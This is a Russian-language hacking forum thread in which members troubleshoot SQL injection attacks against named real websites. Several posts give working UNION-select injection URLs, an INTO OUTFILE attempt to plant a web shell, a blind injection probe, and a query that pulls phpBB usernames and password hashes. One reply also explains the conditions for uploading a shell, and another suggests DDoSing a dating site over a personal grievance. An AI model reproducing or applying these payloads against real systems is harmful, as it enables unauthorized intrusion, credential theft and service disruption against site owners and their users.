Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Пытаюсь записать в файл так вот он все проводит норм а пройти запрос куда записать не хочет! Ошибка такого вида

    Code:
    MySQL error: 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near [COLOR=SlateGray]'[/COLOR][COLOR=Sienna]\'[/COLOR]/tmp/aaa.php[COLOR=Sienna]\'[/COLOR]--[COLOR=SlateGray]'[/COLOR] at line 1
    Темно-оранжевый - мои ковычки
    Серый - то что он не может прочитать

    Пробывал и в хексе(0x и т.д.) не получаеться!
    Мб кто знает?
     
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    diznt, запрос в студию!
     
  3. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    http://mial.cs.sfu.ca/newsItem.php?id=-1+union+select+1,0x66726f6d205b2063617368205d207768697468206c6f7665202929292929,3,4,5,6,7,8+from+User+into+outfile+'/tmp/aaaa.php'--

    То что в хексе там текст 'test!' так как чтобы проверить дейстивтельно ли записал он запрос
     
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    А зачем он нужен, если и так видно, что ковычки экранируются.

    diznt
    Путь должен быть в ковычках, в хексе нельзя, в твоём случае залить не получится

    add И там даже file_priv N помоему
     
    #5164 Kakoytoxaker, 31 Jan 2009
    Last edited: 31 Jan 2009
  5. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    americanbible.org/absport/news/item.php?id=181'

    При подборе вообще не реагирует. в чем дело?

    jokester я так и так пробывал конечно))
     
  6. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    diznt, шелл можно залить если: 1) Ковычки не экранизируются. 2) Если Linux, то должна читаться (/etc/passwd) (Это я проще объяснил =\). 3) Надо, что бы прав хватило на читалку/найти папку с правами доступными для данного пользователя, которого мы определяем с помощью таблицы mysql.user.

    http://www.americanbible.org/absport/news/item.php?id=181' - с чего ты взял, что тут есть скуля?
     
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    А что тут есть?
     
  8. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    Похоже на хранимую процедуру, скорее всего инъекцию не удастся провести
    зачем? не обзяательно, для INTO OUTFILE нужно magic_quotes_gpc=off и полный путь до папки, доступной на запись. Получить этот путь можно разными способами, /etc/passwd может вообще не пригодится.
    P.S. что за мода пошла писать ковычки?
     
    1 person likes this.
  9. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    http://www.americanbible.org/absport/news/item.php?id=181'/**/and/**/if(4=substring(version(),1,1),(select/**/1/**/from/**/ABS_shortcutURLs),1)/*
     
    11 people like this.
  10. V1R

    V1R New Member

    Joined:
    31 Jan 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    привет всем. а где можно посоветоваться на счет мобильно6о сата love.wab.ru. я читал сдесь сегодня что в 2007 году разбирали этот сайт- но только на начальной стадии. брат достал уже . лезет туда знакомится а потом пинкоды отсылает. хотелось бы этих его подружек отправить на заслуженый отдых.
    P.S в его анкете менял пароль но он заводит новую анкету надоел у матери деньги таскать!!
     
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Душещипательная история =\
    Как вариант можешь заDDoSить. Да простят меня модераторы =)
     
  12. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+cpg_users--

    Блин почему не выводит ничего? =\
    Таблица такая сам смотрел и колонка тоже такая
     
  13. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    diznt, проверь table_schema. То есть таблица может находится в другой ДБ, то есть имя таблицы будет писаться так. [table_schema].[имя таблица]
     
    #5173 Tigger, 31 Jan 2009
    Last edited: 31 Jan 2009
  14. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    Да таблица существует в этой базе данных, но она пустая. Оттуда нечего брать.
     
  15. Qam

    Qam New Member

    Joined:
    16 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Фильтрация таким образом не повличет ли за собой уязвимости?
    $style_text = htmlspecialchars(trim($HTTP_POST_VARS['style_text']));
     
  16. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Для cpg_users table_schema=KOLESHEV_1

    но

    http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+KOLESHEV_1.cpg_users+--+

    command denied to user ..

    зато можешь посмотреть юзеров форума

    http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,concat_ws(0x2F,username,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+phpbb_users+limit+1,1+--+
     
  17. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    ElteRUS вопрос
    почему в конце +--+ ставиться? или к примеру -- или /* ? Я просто не понимаю а ставлю --
     
  18. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    diznt, потому что согласно документации mysql после -- должен идти пробел

    А почему вообще ставится ? Это знаки комментария. Нужны для того что-бы обрубить продолжения запроса, когда мы всовываемся в него со своей инъекцией
     
    #5178 ElteRUS, 31 Jan 2009
    Last edited: 1 Feb 2009
  19. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Не думай об этом)) Делай так. Составил запрос. Ошибка? Пробуешь --. не пашет? Пробуешь /*. Не пашет? Пробуешь +--+. Снова не пашет? Ну на кройняк ++-- =))
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Все что идёт после этих символов запросом не считается (как // в пхп)
     
Thread Status:
Not open for further replies.